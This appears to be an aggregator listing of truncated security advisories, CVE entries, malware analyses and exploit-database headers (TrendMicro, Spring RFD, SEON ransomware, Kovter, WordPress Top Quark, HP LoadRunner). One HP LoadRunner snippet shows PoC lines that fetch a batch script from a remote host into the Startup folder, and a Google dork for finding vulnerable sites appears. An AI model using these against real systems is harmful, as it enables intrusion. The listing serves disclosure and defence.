TrendMicro Anti-Threat Toolkit Improper Fix

Hi @ll, on September 29, 2019, John Page reported a remote code execution with escalation of privilege in TrendMicro's Anti-Threat Toolkit to its vendor. TrendMicro assigned CVE-2019-9491 to this vulnerability and told the reporter, his dog and the world on October 18, 2019, that they had fixed t...

CB TAU Threat Intelligence Notification: SEON Ransomware Distributed via Drive-By Attack Campaign

SEON Ransomware ver 0.2 was found being distributed by the GreenFlash Sundown exploit kit via a drive-by-attack campaign. After performing the encryption, SEON will drop and display the following ransom note and append ‘.fixt’ as the extension to the encrypted file. Figure 1: Screenshot of the...

GreenFlash Sundown exploit kit expands via large malvertising campaign

Exploit kit activity has been relatively quiet for some time, with the occasional malvertising campaign reminding us that drive-by downloads are still a threat. However, during the past few days we noticed a spike in our telemetry for what appeared to be a new exploit kit. Upon closer inspection ...

Files or Directories Accessible to External Parties in org.springframework:spring-core

Under some situations, the Spring Framework 4.2.0 to 4.2.1, 4.0.0 to 4.1.7, 3.2.0 to 3.2.14 and older unsupported versions is vulnerable to a Reflected File Download RFD attack. The attack involves a malicious user crafting a URL with a batch script extension that results in the response being...

APTSimulator - A toolset to make a system look as if it was the victim of an APT attack

APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. Use Cases 1. POCs: Endpoint detection agents / compromise assessment tools 2. Test your security monitoring's detection capabilities 3. Test your SOCs response on a...

QNAPQsyncClientWindows 4.2.1.0602 Privilege Escalation

Hi @ll, the executable installer QNAPQsyncClientWindows-4.2.1.0602.exe, available from , has like almost all executable installers multiple vulnerabilities: 1: arbitrary remote code execution WITH escalation of privilege On a fully patched Windows 7 SP1 it loads and executes the following Windows...

CVE-2015-5211

Under some situations, the Spring Framework 4.2.0 to 4.2.1, 4.0.0 to 4.1.7, 3.2.0 to 3.2.14 and older unsupported versions is vulnerable to a Reflected File Download RFD attack. The attack involves a malicious user crafting a URL with a batch script extension that results in the response being...

DEBIAN-CVE-2015-5211

Under some situations, the Spring Framework 4.2.0 to 4.2.1, 4.0.0 to 4.1.7, 3.2.0 to 3.2.14 and older unsupported versions is vulnerable to a Reflected File Download RFD attack. The attack involves a malicious user crafting a URL with a batch script extension that results in the response being...

Kovter becomes almost file-less, creates a new file type, and gets some new certificates

Trojan:Win32/Kovter is a well-known click-fraud malware which is challenging to detect and remove because of its file-less persistence on infected PCs. In this blog, we will share some technical details about the latest changes we have seen in Kovter’s persistence method and some updates on their...

Updated springframework packages fix security vulnerability

Under some situations, the Spring Framework is vulnerable to a Reflected File Download RFD attack. The attack involves a malicious user crafting a URL with a batch script extension that results in the response being downloaded rather than rendered and also includes some input reflected in the...

PYSEC-2014-42

The batch id change script renameObjectsByPaths.py in Plone before 4.2.3 and 4.3 before beta 1 allows remote attackers to change the titles of content items by leveraging a valid CSRF token in a crafted request...

Wordpress Top Quark Architecture 2.10 - Arbitrary File Upload Vulnerability

No description provided by source. Exploit Title: Wordpress Top Quark Architecture Version 2.10 Arbitrary File Upload Google Dork: inurl:wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/ Date: 11/06/2012 Exploit Author: Adrien Thierry Vendor Homepage: http://topquark.com/ Software...

ManageEngine Applications Manager Authenticated Code Execution

No description provided by source. $Id: manageengineappsmngr.rb 12281 2011-04-08 14:06:10Z bannedit $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...

WordPress Top Quark Architecture 2.10 Shell Upload

Exploit Title: Wordpress Top Quark Architecture Version 2.10 Arbitrary File Upload Google Dork: inurl:wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/ Date: 11/06/2012 Exploit Author: Adrien Thierry Vendor Homepage: http://topquark.com/ Software Link:...

WordPress Plugin Top Quark Architecture 2.10 - Arbitrary File Upload

Exploit Title: Wordpress Top Quark Architecture Version 2.10 Arbitrary File Upload Google Dork: inurl:wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/ Date: 11/06/2012 Exploit Author: Adrien Thierry Vendor Homepage: http://topquark.com/ Software Link:...

HP LoadRunner 9.5 File Creation

' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\..\..\Documents and Settings\All...

HP LoadRunner 9.5 remote file creation PoC

Exploit for unknown platform in category dos / poc ========================================== HP LoadRunner 9.5 remote file creation PoC ========================================== Title: HP LoadRunner 9.5 remote file creation PoC CVE-ID: OSVDB-ID: Author: Pyrokinesis Published: 2009-09-29 Verifie...

Copy and the real hidden administrator account(complete batch)-bug warning-the black bar safety net

Online to see a lot of copy administator permissions to the account of the method or tool, such as the establishment of the admin$, the so-called hidden account. And copy administrator permissions. In fact, this is a temporary, one-time hidden only, Server reboot through the“Computer Management”o...

Universal honker CNN attack techniques parsing-vulnerability warning-the black bar safety net

Recently, CNN anchor, Carver te for the Chinese people with a strong discriminatory remarks, and CNN for this event the lack of sincerity of the apology and for the Chinese government's groundless accusations, roused the people of the country to strong indignation. So in some Patriotic art...

The detection of a account on the default permissions of the directory is writable for the script-vulnerability warning-the black bar safety net

Author: invincible most lonelyE. S. T source: evil octal China in the web after the invasion,often be looking for a writable directory to upload the webshell or other things,this is a critical issue. Most of the administrators to some system directory, do the permissions to change settings,but...